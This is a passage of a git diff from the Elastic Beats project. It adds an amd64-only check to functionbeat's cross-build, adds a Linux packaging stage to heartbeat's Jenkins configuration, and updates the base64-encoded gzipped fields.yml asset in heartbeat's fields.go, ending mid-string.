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" } diff --git a/x-pack/functionbeat/magefile.go b/x-pack/functionbeat/magefile.go index a317bd0cb71f..95861a3f0f2e 100644 --- a/x-pack/functionbeat/magefile.go +++ b/x-pack/functionbeat/magefile.go @@ -10,6 +10,7 @@ import ( "fmt" "os" "path/filepath" + "runtime" "time" "github.com/magefile/mage/mg" @@ -89,6 +90,7 @@ func BuildGoDaemon() error { // CrossBuild cross-builds the beat for all target platforms. func CrossBuild() error { + // Building functionbeat manager err := devtools.CrossBuild() if err != nil { @@ -107,6 +109,11 @@ func CrossBuild() error { continue } + if runtime.GOARCH != "amd64" { + fmt.Println("Crossbuilding functions only works on amd64 architecture.") + return nil + } + err := devtools.CrossBuild(devtools.AddPlatforms("linux/amd64"), devtools.InDir("x-pack", "functionbeat", "provider", provider.Name)) if err != nil { return err diff --git a/x-pack/heartbeat/Jenkinsfile.yml b/x-pack/heartbeat/Jenkinsfile.yml index 6197aa06a8f2..8e26bb884811 100644 --- a/x-pack/heartbeat/Jenkinsfile.yml +++ b/x-pack/heartbeat/Jenkinsfile.yml @@ -67,3 +67,7 @@ stages: mage: "mage build test" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/heartbeat/include/fields.go b/x-pack/heartbeat/include/fields.go index 739136c1c49f..41c3feec2cd8 100644 --- a/x-pack/heartbeat/include/fields.go +++ b/x-pack/heartbeat/include/fields.go @@ -19,5 +19,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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